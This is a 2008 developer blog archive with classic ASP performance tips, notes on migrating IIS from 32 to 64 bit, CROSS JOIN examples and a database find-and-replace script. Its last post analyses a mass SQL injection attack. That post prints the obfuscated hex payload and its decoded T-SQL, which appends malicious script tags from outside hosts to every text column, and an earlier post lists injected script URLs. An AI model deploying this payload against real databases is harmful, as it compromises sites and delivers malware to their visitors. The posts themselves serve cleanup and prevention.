1. Look for nested loops and replace them with SQL stored procs. It's surprising how many times I have looked at sites that, when outputting product hierarchies or menus on those old catalogue sites, use nested loops to build up the content. It's usually the work of people who got into programming on the web side with little or no SQL knowledge, which was then learnt later only as and when they needed somewhere to persist the data. Replace nested loops with a SQL stack (see BOL) or, in SQL 2005, a recursive CTE (a minimal sketch of which is shown below). From tests I have found the stack to perform slightly faster than the CTE, but both will outperform nested loops. The data will most likely be in an adjacency table anyway, so it's just the method of outputting it that changes. I remember replacing one such beast of nested loops with a stored procedure stack and it increased performance by a factor of 20.
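As a rough guide, this is a minimal sketch of the recursive CTE approach against a hypothetical CATEGORIES adjacency table (the CategoryPK, ParentFK and Name columns are assumptions):

WITH CategoryTree (CategoryPK, Name, ParentFK, Depth)
AS
(
   -- anchor: the top level items
   SELECT CategoryPK, Name, ParentFK, 0
   FROM CATEGORIES
   WHERE ParentFK IS NULL

   UNION ALL

   -- recursive part: the children of the previous level
   SELECT c.CategoryPK, c.Name, c.ParentFK, ct.Depth + 1
   FROM CATEGORIES AS c
   JOIN CategoryTree AS ct
      ON c.ParentFK = ct.CategoryPK
)
SELECT CategoryPK, Name, Depth
FROM CategoryTree
ORDER BY Depth, Name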

2. Re-use those objects. Do you have helper functions that carry out regular expressions or file system object actions and instantiate the object within the function? If you call these functions more than once on a page you are creating an unnecessary overhead. Have a global include file where you declare some often used variables; the first time you call the function, initialise the object if it doesn't already exist, otherwise use the existing object pointer. Then destroy them all in your global footer.

3. Simplify any complex regular expressions by breaking them down into multiple parts. I have had problems with badly written regular expressions causing CPU on our webserver to max out at 100%. On our quad it would jump to 25%; four hits at the same time and it was at 100%, and then no other pages would load. Complex expressions that do lots of backtracking also cause overhead, and the longer the string you are testing against, the more overhead you will get. Remember VBScript's regular expression engine is not as good as some others, so it's better to break those long complex expressions up into smaller tests if possible.

4. String concatenation. In ASP.NET you have the StringBuilder class, but in ASP classic you should create your own using an array to store the strings and then do a JOIN at the end to return the result. Doing something like the following

For x = 1 to 100
strNew = strNew & strOtherString
Next
may work okay if the size of the string in strOtherString is small and you have few iterations, but once those strings get larger, the amount of memory used to copy the existing string and then append to it grows very quickly.

5. Try to ReDim arrays as few times as possible, especially if you are doing a Preserve. It's always best to Dim to the exact size beforehand, but if you don't know how big your array will be, then Dim it to a large size first and use a counter to track how many elements you actually add. Then at the end you ReDim Preserve once, back down to the number of elements you actually used. This uses a lot less memory than having to ReDim Preserve on each addition to the array.

6. Use stored procedures for complex SQL and try to reduce database calls by sending multiple SQL statements together and then using NextRecordset() to move to the next set of records when you need to. Using stored procedures also reduces network traffic, as it's much easier to connect to the DB once and pass through the names of 3 stored procedures than to connect 3 times, passing through the X lines of SELECT statements that each recordset requires.
strSQL = "EXEC dbo.usp_asp_get_records1; usp_asp_get_recorddetails; usp_asp_get_country_list;"

Set objRS = objConnection.Execute(strSQL)

If not(objRS.BOF AND objRS.EOF) Then
arrRecords = objRS.GetRows()
Set objRS = objRS.NextRecordset()
End If
If not(objRS.BOF AND objRS.EOF) Then
arrRecordDetails = objRS.GetRows()
Set objRS = objRS.NextRecordset()
End If
If not(objRS.BOF AND objRS.EOF) Then
arrCountryList = objRS.GetRows()
End If
7. Make sure that you don't put multiple conditions in IF statements. ASP classic doesn't support short circuiting, which means it evaluates every condition in an IF statement even if the first one is false. So rewrite code such as:

If intCount = 1 AND strName = "CBE" AND strDataType = "R" Then
'Do something
End If

as nested IF statements:

If intCount = 1 Then
If strName = "CBE" Then
If strDataType = "R" Then
'Do something
End If
End If
End If
Also make sure you evaluate conditions in the most efficient order. If you are checking a value for True or False then you shouldn't waste an extra operation when you can just swap the order of the branches.

If Not(bVal) Then
Response.Write("NO")
Else
Response.Write("YES")
End If
Should obviously be

If (bVal) Then
Response.Write("YES")
Else
Response.Write("NO")
End If
8. Cache as much data as possible if it doesn't change frequently. If you have lists that come from a database but never change, or change very infrequently, then you can either store them in memory and reload them every so often, or write the array to a file and use that static version, only re-creating the file when the data changes. I always add an admin-only function to my sites that, at the press of a button, reloads everything I need into files and cache. This prevents unnecessary database lookups.

9. Pages containing database content that only changes when a user saves that content can be published as static HTML files if possible. Rather than rebuilding the page from the DB each time someone views it, you serve the static version and only rebuild the page when the user updates the content. For example a lot of CMS systems store the content within the DB but create a static version of the page for quick loading.

10. Encode and format content on the way into the database, not each time it's outputted for display. It's more cost efficient to do something once on the way in than hundreds of times on the way out.

These are just a few of the things I have found to be very beneficial in speeding up a classic ASP site on the web side of things. As well as any performance tweaks that can be done application side, you should take a look at the database to make sure that's performing as well as possible. If your site is data driven then a lot of the performance will come down to how quickly you can build those recordsets up and deliver them to the client.

Migrating IIS web application from 32 bit to 64 bit server.

Changing Servers from a 32 to 64 bit environment

By Strictly-Software

I recently had to go through the process of moving a website from a 32 bit windows to 64 bit windows server.

It was one of those tasks that I presumed would be pretty simple and not involve much work but turned into a proper nightmare.

I thought there might have been some sort of “gotcha” guide out on the web somewhere but if there was at the time I couldn’t find it!

I could either find bits and bobs about some individual problems or nothing at all. So I promised myself that on completion I would create an article myself detailing all of the major problems I had to overcome and the solutions I used. So here it is!

The original system was a Windows 2003 server hosting IIS 6.0 and running ASP classic sites.

We had got to the limits in terms of memory allocation and had boosted performance as much as we could in the application (see top 10 tips for boosting ASP classic site performance) therefore we wanted to try moving to a new 64 bit server before considering any large scale application rewrite to .NET.

1. COM objects and compiled dll libraries.

We found that most of our 3rd party COM objects needed upgrading to 64 bit.

You should check each object in turn to see if you need new installations or licences. Objects that we used that needed upgrading included:
  • ASPEmail
  • ASPJPEG
  • ASPUpload
  • DTSearchEngine
  • ISAPI_Rewrite

2. Running scripts.

Scheduled jobs (.bat, .cmd, .vbs) all need to be able to run in a 64 bit environment.

A 64 bit script host cannot load 32 bit COM objects, so if your script tries to instantiate them you will get errors unless you upgrade those COM objects to 64 bit (see above).

Another option is to run the script with the 32 bit version of cscript found in the c:\windows\SysWOW64\ directory, which enables you to run 32 bit scripts in a 64 bit environment.

3. ISAPI Rewrite

The name of the rewrite configuration file changes from httpd.ini to .htaccess, and if you compare the two formats they differ in syntax, e.g. the flag [I] for "Ignore Case" becomes [NC] "No Case" and the 301 permanent redirect flag [RP] becomes [R=301].

Also, for rewrite rules the 64 bit version, which uses a syntax similar to that used on Apache servers, expects the pattern to be wrapped in start and end anchors (^ and $), e.g.

# 32 BIT RULE

RewriteRule /some-old-page.htm http://www.newsite.com/newpage.htm [I,O,RP,L]

Becomes

#64 BIT RULE

RewriteRule ^/some-old-page.htm$ http://www.newsite.com/newpage.htm [NC,R=301,L]


There is a helpful conversion tool within IIS that appears in a new tab under each site to convert your current files to the new format if you don't want to do it by hand.

4. ADO Connection Strings

If you are using an MDAC connection string to connect to an MS SQL database such as:

DRIVER={SQL Server}; SERVER=server_name_or_address;
DATABASE=database_name; UID=username; PWD=password;

You will need to change it to SQLOLEDB as MDAC is not supported on 64 bit Windows systems.

PROVIDER=SQLOLEDB; SERVER=server_name_or_address;
DATABASE=database_name; UID=username; PWD=password;


5. Issues related to changing to an SQLOLEDB connection string.

Changing to the SQLOLEDB provider will mean that you may have problems with SQL that returns multiple recordsets, either client side or server side SQL or stored procedures.

For example with the MDAC connection string, a client side SQL statement like the one below in an example piece of ASP code would work fine.

NOTE the two SELECT statements in the SQL and the objRS.NextRecordset statement against the resulting recordset.


strSQL = "DECLARE @vals varchar(2000); " & _
  "SELECT @vals = COALESCE(@vals + ',', '') + CAST(a.CategoryFK AS varchar(10)) " & _
  "FROM DATA_CATEGORIES_VALUES as a " & _
  "WHERE a.IDFK = 3556 AND " & _
  "a.DataTypeFK = 'JEB';" & _
  "SELECT @vals as val;"

Set objRS = objConnection.Execute(strSQL)

'* move to the next recordset as the first one just builds the string,
'* but it's the 2nd one that returns the values
Set objRS = objRS.NextRecordset

If Not(objRS.BOF AND objRS.EOF) Then
 val = objRS("val")
End If

However using the SQLOLEDB provider will result in an error such as

“Operation is not allowed when the object is closed”

when it tries to move to the next recordset.

I believe this is because the temporary stored procedure that the MDAC driver creates to run client side SQL does not include a “SET NOCOUNT ON” statement, so the rows affected count from the first SELECT comes back as the first recordset. The SQLOLEDB provider effectively includes this line, so only the one real recordset is returned and there is no longer any need (or ability) to move to the next one with:

Set objRS = objRS.NextRecordset

Using “SET NOCOUNT ON” means that the first recordset implicitly returned by SQL server containing the number of rows affected by the first SELECT statement is not returned.

This would be the case for any SELECT statement that does not itself return a dataset.

6. Stored Procedures and SQLOLEDB

Stored procedures which do not have the SQL statement “SET NOCOUNT ON” at the top of their code block may also now cause problems if they return multiple recordsets with data, and you may get “Operation is not allowed” or “Item does not exist with this name or ordinal” errors when trying to reference the recordset object in your client side code.

Including “SET NOCOUNT ON” at the top of stored procedures is good practice anyway, and since SQL 2005 it's part of the default stored procedure template. Therefore any procs that don't include it should be updated to prevent these sorts of issues.
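A minimal sketch of the pattern; the procedure, table and column names are just for illustration:

CREATE PROCEDURE dbo.usp_asp_get_job_details
   @JobPK int
AS
SET NOCOUNT ON -- stop the "rows affected" counts being returned as extra recordsets

-- first recordset: the job itself
SELECT JobPK, Title, CreateDate
FROM JOBS
WHERE JobPK = @JobPK

-- second recordset: its categories
SELECT CategoryFK
FROM JOB_CATEGORIES
WHERE JobFK = @JobPK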

7. Returning BLOBS (varchar(max), nvarchar(max), text, ntext etc)

A benefit to changing to the SQLOLEDB provider is that you no longer have to put your BLOBS at the end of your SELECT statements (e.g nvarchar(max), varchar(max), ntext, text).

Previously you had to put these columns at the end of the SELECT statement after any non BLOB columns to prevent them from being returned empty e.g:


SELECT CandidateID, Name, DOB, Town, County, Blob1, Blob2, Blob3


With SQLOLEDB you do not have to do this as it seems to handle them better than MDAC so the following will return values for the BLOB columns even though they are not at the end of the SELECT.


SELECT CandidateID, Name, Blob1, Blob2, Blob3, DOB, Town, County

These are the main configuration issues I found when moving to a 64 bit environment but please post any comments if there are other issues related to migrating IIS web applications from 32 to 64 bit platforms.

I am sure there are plenty more!

By Strictly-Software


© 2008 Strictly-Software

Sunday 7 September 2008

When would you use a CROSS JOIN

Cross Joins??

Like most people, I imagine, when I first heard about CROSS JOINs in SQL many years ago I remember thinking to myself: when would I ever find myself in a situation, developing a website, where I'd make use of them? They are one of those features that are infrequently used in day to day web development, but over time I have come across a few situations where they have been very useful and solved some specific problems. I'm sure there are many more that could be mentioned, but I will talk about 2 specific situations where I have made use of them recently.


1. Many to Many Save

On nearly all of my sites I have one or more pages that output the results of some sort of search that the user has made on a previous page. On the results page the user can select one or more of these records to view in more detail, by ticking a checkbox or highlighting the row with a double click etc. On some sites I also have a folder option that allows the user to save the selected records into a new or existing folder/group for later use. Taking a jobboard as an example, the user could select 3 candidates, "Mr Smith, Mr Jones and Mr Robins", from the results and then select 2 folders to save these candidates to, "Top Candidates" and "Tuesdays Selections".
In the old days, before I fully understood the flexibility and power of SQL, I would do something like the following

(pseudo code)

For Each Candidate in Selected Candidates
For Each Folder in Selected Folders

'* Execute SQL either in a proc or inline
INSERT INTO CANDIDATE_GROUPS
(Folder, Candidate)
VALUES
(Folder, Candidate)

Next Folder
Next Candidate


Which for my example would involve 6 loop iterations, 6 separate calls to the database and 6 separate INSERT statements. Obviously selecting more candidates and more folders would increase the number of loops.

What I always do nowadays is collect the two strings of delimited values and then call a stored procedure once, passing the strings as parameters. Then, making use of my SPLIT user defined function, I simply use a CROSS JOIN to populate the table.

CREATE PROCEDURE dbo.usp_asp_save_candidate_groups
@Candidates varchar(1000),
@Groups varchar(1000)
AS

SET NOCOUNT ON

INSERT INTO CANDIDATE_GROUPS
(Folder, Candidate)
SELECT a.[VALUE],b.[VALUE]
FROM dbo.udf_SPLIT(@Groups,',') as a,
dbo.udf_SPLIT(@Candidates,',') as b


This way I have reduced the application code to the bare minimum and there is only one INSERT statement. The overhead is now the CROSS JOIN and the SPLIT functions that convert each string of delimited values to a TABLE variable, however this is always going to outperform nested loop inserts by a mile. Even though the SPLIT function uses multiple INSERTs to populate the TABLE variable that is then selected from, the CROSS JOIN code outperforms the nested loops by a factor of 20+ in tests I have run. Plus you are reducing network traffic and simplifying your application code.
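For reference, this is a minimal sketch of the sort of split function I mean; the real udf_SPLIT differs slightly but the idea is the same:

CREATE FUNCTION dbo.udf_SPLIT
(
   @List      varchar(1000),
   @Delimiter varchar(5)
)
RETURNS @Values TABLE ([VALUE] varchar(100))
AS
BEGIN
   DECLARE @Pos int

   SET @List = @List + @Delimiter -- ensure the final value is captured
   SET @Pos  = CHARINDEX(@Delimiter, @List)

   WHILE @Pos > 0
   BEGIN
      IF @Pos > 1
         INSERT INTO @Values ([VALUE])
         VALUES (LTRIM(RTRIM(LEFT(@List, @Pos - 1))))

      -- chop off the value just handled and find the next delimiter
      SET @List = SUBSTRING(@List, @Pos + LEN(@Delimiter), LEN(@List))
      SET @Pos  = CHARINDEX(@Delimiter, @List)
   END

   RETURN
END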


2. Matrix Table

On a recent jobboard website I had to come up with a matrix table so that the user had access to the number of live jobs in the system for every possible category combination. You may have seen the sort of thing I mean, where a filter form lists job related categories with the number of jobs in brackets next to them e.g

Job Type
-Full Time (50)
-Part Time (23)

Sector
-Management (4556)
-IT (3434)
-Sales (2456)

The page had to load fast, so I didn't want to calculate the counts on the fly, and there were 10 category types with over 150 categories that could be saved against a job in any combination. It also meant that as the user narrowed down his or her job search, the counts had to reflect the options already selected. The first idea was to create a matrix table that would hold a row for each possible combination and a column for the number of jobs.

JobSector  JobType  Industry  Region  Location  Role  LiveJobs
12         8762     562       992     NULL      NULL  345
12         8762     562       993     NULL      NULL  321
12         8762     562       994     NULL      NULL  78
12         8762     562       995     NULL      NULL  963
12         8762     562       996     NULL      NULL  13

This would have allowed me to do a simple statement such as

SELECT LiveJobs FROM MATRIX WHERE JobSector=12 AND Region=992

to get the number of live jobs per category combination.


Finance job in Afghanistan anyone?

So I knocked up some SQL to test how long it would take to generate this matrix and clicked the run button. However it soon became apparent that this wasn't going to work as well as expected. After an hour or so the transaction log had filled the disk and we had only populated 30 million or so rows out of some stupidly high number running into the billions.
I quickly decided this wasn't the way to go. Apart from the problem of generating this matrix table quickly, most of the possible combinations were never actually going to have a job count greater than 0. I doubt many UK based jobboards have ever posted jobs in the private equity and venture capital sector based in Afghanistan, so it seemed a pointless overhead trying to generate category combinations that would never be accessed.

So after a re-think I decided to rebuild the matrix using CROSS JOINs to populate the table, so that instead of holding all possible category combinations it would only hold the combinations actually saved against each job. If a job was saved with only one category for each category type then there would only be one row in the matrix table for that job. If, however, one category type had 3 options selected and all the rest one, then there would be 3 rows, and so on. This meant we would only ever hold data for categories being used and the table would be as small or as large as it needed to be.

A cut down version of the finished SQL that creates the matrix table is below. I have a working table, #SITE_JOB_CATEGORY_VALUES, that holds each job and each saved category ID, and from the first SELECT that outputs the job ID it CROSS JOINs each derived table to get all the combinations of saved category values for that job.


INSERT INTO SITE_JOB_CATEGORY_MATRIX_A
(JobPK,JobSector,JobType,Industry)
SELECT sjcv.JobFK,a.JobSector,b.JobType,c.Industry
FROM #SITE_JOB_CATEGORY_VALUES as sjcv,
(
SELECT a.JobFK, CategoryFK as JobSector
FROM (SELECT @JobPK as JobFK) as a
LEFT JOIN #SITE_JOB_CATEGORY_VALUES as b
ON b.JobFk = a.JobFK
AND CategoryTypeFK = 2248
) as a ,(
SELECT a.JobFK, CategoryFK as JobType
FROM (SELECT @JobPK as JobFK) as a
LEFT JOIN #SITE_JOB_CATEGORY_VALUES as b
ON b.JobFk = a.JobFK
AND CategoryTypeFK = 2249
) as b ,(
SELECT a.JobFK, CategoryFK as Industry
FROM (SELECT @JobPK as JobFK) as a
LEFT JOIN #SITE_JOB_CATEGORY_VALUES as b
ON b.JobFk = a.JobFK
AND CategoryTypeFK = 2190
) as c
GROUP BY sjcv.JobFK,a.JobSector,b.JobType,c.Industry


The reason each derived table selects first from a constant and then LEFT JOINs to the main category table is that each derived table needs to return a value even if it's a NULL, otherwise the other derived tables wouldn't join to it and I'd lose the row for that job.

Depending on how many categories were selected under each category type (as some options allow multiple selections) one job could have one or many rows covering all the possible variations.

For example this job has one category value per category type apart from Region and Location, which have 2 each, so there is a total of 4 rows to be output into the matrix.

JobPK JobSector JobType Industry Region Location Role
3434 12 8762 562 992 3543 78
3434 12 8762 562 993 3543 78
3434 12 8762 562 992 3544 78
3434 12 8762 562 993 3544 78

To get the job count you just take a COUNT of the DISTINCT JobPK values, with a WHERE clause containing the columns and values that the user is filtering by.
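Using the matrix table from the example above, the count query might look something like this (the filter values are just illustrative):

SELECT COUNT(DISTINCT JobPK) AS LiveJobs
FROM SITE_JOB_CATEGORY_MATRIX_A
WHERE JobSector = 12
AND Region = 992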

The application references this table through a SYNONYM because behind the scenes there are 2 of these matrix tables: the current one, and the one that a SQL Server Agent job rebuilds every 15 minutes. Once the rebuild is done the job points the SYNONYM at the new table and drops the existing one.
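As a rough sketch (the object names here are illustrative), the swap at the end of each rebuild could be as simple as:

-- point the synonym at the freshly built table and throw the old one away
DROP SYNONYM dbo.SITE_JOB_CATEGORY_MATRIX
CREATE SYNONYM dbo.SITE_JOB_CATEGORY_MATRIX FOR dbo.SITE_JOB_CATEGORY_MATRIX_B
DROP TABLE dbo.SITE_JOB_CATEGORY_MATRIX_A

The application only ever queries the synonym name, so it never needs to know which physical table is current.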

Using this approach I can rebuild the matrix table every 15 minutes in a matter of seconds. I have a clustered covering index on all the columns, ordered from the most selective categories to the least, and I can output the job count per category and run database searches using the user's selections at lightning speed. The only downside is that there is a 15 minute delay between a job being posted on the site and it becoming searchable, but that seems to be an acceptable limit to the posters.
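For reference, a sketch of that index (the column order is purely illustrative, most selective first) might be:

CREATE CLUSTERED INDEX clidx_SITE_JOB_CATEGORY_MATRIX
ON dbo.SITE_JOB_CATEGORY_MATRIX_B (JobSector, JobType, Industry, Role, Region, Location, JobPK)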

So those are just two uses of a CROSS JOIN I have used lately and I am sure there are many more useful implementations. If you have any more then please let us hear about them.

Friday 5 September 2008

Before we rewrite all those ASP Classic sites as .NET

What Language Should I use?

Although .NET is the way a large percentage of websites are going, I still find a lot of them surprisingly slow. As a developer you always want to work with the newest technologies, spending time learning new languages to boost your CV and working with whatever is cutting edge at the time just for the fun of it. However most developers work for someone, and a lot of the time the customer your sales team sells to doesn't care whether the site they are paying for is written in PHP, ASP.NET or ASP Classic as long as it works, is fast and doesn't break every time more than 10 people visit it at the same time.


The Quickest .NET Site Development in History

My boss used to joke that we should upgrade one of our biggest sites from classic ASP to .NET but rather than rewriting it all we should just change all the file extensions from .asp to .aspx. We used to laugh about this thinking it would be a good way to get a .NET site up quickly that was faster than our competitors with no development costs. However it was only a pie in the sky joke until recently when we actually sold a version of this software to a foreign company who wanted control of the source code.

A few months later, when one of their management team spoke to my boss, he proudly informed him that they had indeed rewritten the whole system in .NET and had paid a lot of money for doing so. My boss replied that if they really had done it that quickly we would like a copy ourselves, as it would save us some time re-developing the system; it had taken us 2+ years to get to the stage we were at when we sold it.

We all eagerly gathered round the nearest PC and entered the URL to examine this marvel of technology that had taken only 2 months for a complete rewrite. Imagine our surprise when we were met with the exact same site: not just the look and feel but the exact same site structure, page layout, CSS styling, client side JavaScript and so on. The only difference we could find was a new sub directory that used the company's name before our existing site structure, and all the pages were now renamed .aspx.

We got some of our .NET developers down to view the source code and found nothing to indicate it had been generated by .NET code. In fact it looked exactly like the classic ASP source code, including some secret debug code generated by ASP that I had output in specific places hidden in HTML comments. Nothing had changed apart from the extensions!

We reckoned that maybe the Indian team that had been given the contract for the rewrite had taken one look at how much code there was, and how complicated it would be even to understand without any training let alone rewrite, and had taken the decision my boss had batted around as a joke.

Of course we no longer had access to their servers so we couldn't confirm 100% that it had been a file extension change and nothing else. Maybe they had in fact re-written the whole system in .NET and reproduced every single feature that was already there in the exact same way as before including all my debug statements and client side JS code that was generated by the system. If that was the case then what was the benefit to the client? They had just forked out a huge bill for a rewrite with no visible benefit. Another indicator that the site hadn't been rewritten was that it was still as fast as it was previously so I would give pretty good odds that the Indian outfit that had the contract made a very easy £20k or so.

My point is that if you have a system that is performing well and is earning your company £££ with constant sales, does the language it's written in actually make much of a difference to the sale of that product? Wouldn't the speed, reliability and development time required to get it up and running be more important in the customer's mind, or is that .asp extension just considered too old and unfashionable nowadays by the small percentage of customers who even know the difference between .asp and .aspx?

And if you do have a customer that gets all panicky about those .asp extensions you can always use ISAPI URL rewriting to remove any mention of .asp or .aspx. Remember a fast, well performing site is just that, and the customer is probably not as bothered as you whether it's been developed in classic ASP, .NET 3, PHP, Java or the next 3 lettered acronym language that comes along.

As a developer you may want to rewrite existing sites each time a new sexy technology comes out, but unless there are desirable benefits to the company that pays your wages then it's not going to happen. If you work for a small company then the time and money lost by taking a developer away from new work to rewrite an existing system is not going to be cost effective.

However, saying that, you might have a good case for convincing your boss to put the effort into a rewrite, and there will always be tech savvy customers out there who pay money hand over fist for the latest code base, just like uber rich fashionistas who only wear the same clothes once. However before you do upgrade your classic ASP system try to get it performing as fast as it possibly can first. There's a high chance that a lot of classic ASP systems contain a lot of bad code that could be tweaked to improve performance with a little work.

I work on a number of large high volume traffic sites that are still using classic ASP and have spent considerable time trying to get the best performance out of them, as a rewrite in .NET is going to take considerable time and effort. If I have a poorly performing site then the steps I would go through on the way to a redevelopment are these:

1. Improve the ASP application code as much as possible. See top 10 tips for improving ASP sites.

2. Make sure the database is performing as well as possible and returning data to the application as quickly as it can. View my top tips for increasing SQL performance article.

3. Make sure your hardware and software is configured correctly and that you don't have problems with the servers setup.

4. Consider moving to a 64 bit server and put more RAM in. See tips for moving from 32 to 64 bit server.

5. If all the previous have failed and you still do not have a scalable site that can take large amounts of traffic then consider a rewrite in .NET.

However there may be some fundamental issue in the application's design or site structure that is causing problems. If so then a redesign is required anyway. Creating and maintaining scalable high volume sites in ASP classic is possible but requires some skill and knowledge. You need to weigh up the cost to the company in time and money of a total redesign and redevelopment against any gains made by performance tuning and adding extra hardware.

Thursday 4 September 2008

Script - Find Text in Database

Find and replace text in database

The following stored procedure is my first port of call when I am tasked with investigating sites that have fallen victim to SQL injection attacks. The script has 4 different methods which are outlined in the comments. However I would first use method 1, which outputs a list of any tables and columns within the database that contain the offending hack string together with the number of affected rows. From that data you can then decide whether you need to run the other methods, which either output all the UPDATE statements needed to remove the hack or run them straight off. The other method outputs every single affected row within the database, which is useful as you can determine whether a clean up will work by the placement of the injected code.


Script Details

I have created 2 versions of the proc one for SQL 2005 and one for 2000/7. The only real differences are that I can use NVARCHAR(max) in the 2005 version and the system views are slightly different.
You could choose to update the 2005 version to use the CLR and a regular expression UDF to speed up the text searches.

Download SQL 2005 Version

Download SQL 2000 Version


Searching and replacing multiple strings

I have also created another script that allows you to search for, and if necessary replace, multiple strings in one go. Some sites are charging $300 for code like this and you may have even seen the adverts on this site :). So if I have saved you or your company some money then please feel free to make a donation!

Download code to search and replace for multiple strings

I have added a branch within this proc that checks the version of SQL Server and calls the appropriate proc. However you are probably only going to want to use the procedure that your server supports, so comment out or remove the following code:


IF patindex('%SQL Server 2005%',@@Version)>0
SELECT @SQL_VERSION = 2005
ELSE IF patindex('%SQL Server 2000%',@@Version)>0
SELECT @SQL_VERSION = 2000


And also further down within the loop remove the call to the proc that you're not using.


IF @SQL_VERSION = 2005
BEGIN

EXEC dbo.usp_sql_find_text_in_database
@Mode,
@Value,
@ReplaceString
END
ELSE
BEGIN

EXEC dbo.usp_sql_find_text_in_database_2000
@Mode,
@Value,
@ReplaceString
END




Example Usage
So you need to hunt down and remove the following injected hack strings:

<script src="http://www.usaadp.com/ngg.js"></script>
<script src="http://www.bnsdrv.com/ngg.js"></script>
<script src="http://www.cdport.eu/ngg.js"></script>

Just call the usp_sql_find_multiple_text_in_database proc in the following way




EXEC dbo.usp_sql_find_multiple_text_in_database
@MODE = 4,
@FindString = '<script src="http://www.usaadp.com/ngg.js"></script>||<script src="http://www.bnsdrv.com/ngg.js"></script>||<script src="http://www.cdport.eu/ngg.js"></script>',
@SplitOn = '||',
@ReplaceString = ''


Which will hunt for each string in turn in all textual columns (char,nchar,nvarchar,varchar,ntext,text) and replace it with an empty string.

If you don't want to carry the UPDATE out straight away you could use a different option by changing the @MODE flag:

1 = Output an overview list of each table and column containing the string and the number of rows found for each. This is a good way of checking how much data has been corrupted.

2 = Output all the rows containing the string. This may be quite a lot if your whole database has been compromised.

3 = Output the UPDATE statements needed to remove the string.

4 = Find and replace all occurrences of the string.


So there you go, a way to clean up your infected SQL databases and save yourself $299 at the same time. As I am saving you some money on buying a clean up product, and possibly lots of money in lost business revenue, please consider making a donation so that I can continue publishing scripts like this for free.






Wednesday 3 September 2008

Recovering from an SQL injection hack

Are SQL injection Attacks on the increase?

SQL injection attacks seem to be on the rise lately, not because there are more dedicated hackers spending time trying to exploit sites but because most of the successful attacks are caused by bots that trawl the net 24/7 hammering sites. We should all know by now how to prevent SQL injection from affecting our systems, but if you have a large back catalogue of older sites that were created years ago and are still in production then they are going to be very vulnerable in the current climate. Even if these sites normally receive little or no traffic, if they are accessible on the Internet they are much more likely to fall victim because of these bots.

This article will look at the various ways of preventing and recovering from an attack without having to spend months re-writing all those old sites to future proof them. If people still use these old sites then they should be expected to work and not greet the user with Google's reported hack site page. However we all know time is money, and the money is in new developments, not rewriting that old online ladies shoe catalogue that was written in 98.


Latest forms of SQL Injection

Currently the biggest automated SQL injection attack comes from derivatives of the following:
;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535
292C4043207661263686172283430303029204445434C415245205461626C655F437572736F7220
435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797
36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432
B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207
76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7323E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72%20AS%20NVARCHAR(4000));EXEC(@S);


Which tries to obfuscate the main section of the code by using a local variable to hold an encoded string that is then decoded and executed. If we decode the main section we can see that the code makes use of the system tables to loop through all textual columns, inserting script tags that reference a compromised site.
;DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor
INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www.vtg43.ru/script.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.vtg43.ru/script.js"></script><!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor


There are numerous variations of this hack, with the major differences being:
- The URI of the SCRIPT tag injected into the columns.
- The name and datatype of the main variable.
- Whether the UPDATE statement inserts the SCRIPT tag at the start or end of the existing data or overwrites it totally.

See my post latest SQL injection URIs for a list of the sites currently doing the rounds.

So before we look at the various hack sticking plasters that can be applied, let's just clarify that the best way to avoid SQL injection is to design and develop your site following best practice guidelines.

The best security is a layered approach that involves multiple barriers to make these pesky bots' lives as difficult as possible. So, just to ensure you all know that I am not recommending a plaster as the number 1 SQL injection prevention method, I will summarise some of the best practices that should be utilised when developing new systems.


Prevention with good design.

The following should all be common knowledge by now, as SQL injection is not some newly discovered threat against web kind but has been around and evolving for many years. When developing new sites or upgrading legacy systems you should try to follow these basic rules, as developing with this threat in mind as opposed to as an afterthought will always be the best mode of prevention.
  • Validate all input taken from the client application that is to be passed to the database using a whitelist rather than a blacklist approach. This basically means that rather than stripping out certain characters and symbols you only allow those that the field you are updating requires. This means checking the data type and length of the value and handling anything inappropriate.
  • Use stored procedures or parameterised queries. Let ADO handle any data type conversions and quote escaping. If you are used to building up strings to execute then you have to rely on your own foolproof coding skills to ensure that each value appended to the string is in the correct format and escaped correctly. You may think you would never make such a stupid mistake as to forget to validate a value you add to the string, but say you were off ill one day or on holiday and a junior or a colleague had to make an edit to a page on your site. For example, the required amend might be to add a listbox to a page that lists news articles, so the user can filter by a particular news category that is identified and retrieved from the database using an integer. If they forget to validate the value supplied from the listbox to make sure it is an integer then you can be guaranteed that one of these automated hack bots will exploit it within days, if not hours, of the change going live. I have had this exact situation happen on a major system: the change made by my colleague went live at 11pm and by 7am the following morning the whole site had been compromised because of this one lapse in concentration. If you think that using command objects and parameters is too long winded and complicated to write then create yourself a helper script that makes use of the command's Parameters.Refresh method to build up the code you require.
  • Only grant the database login that the website connects with the minimum privileges it requires. Don't give it automatic write access, and make sure all your CUD (create, update, delete) operations are carried out from stored procedures that the user has execute permission on. I know a lot of people do not like the overhead of creating a stored procedure for simple SELECTs that may only exist to populate a dropdown and therefore use a mixture of stored procedures and client side dynamic SQL, which is fine, but by following this rule even if the hacker finds a hole in one of your client side SELECT statements to exploit they would not have sufficient privileges to update the database.
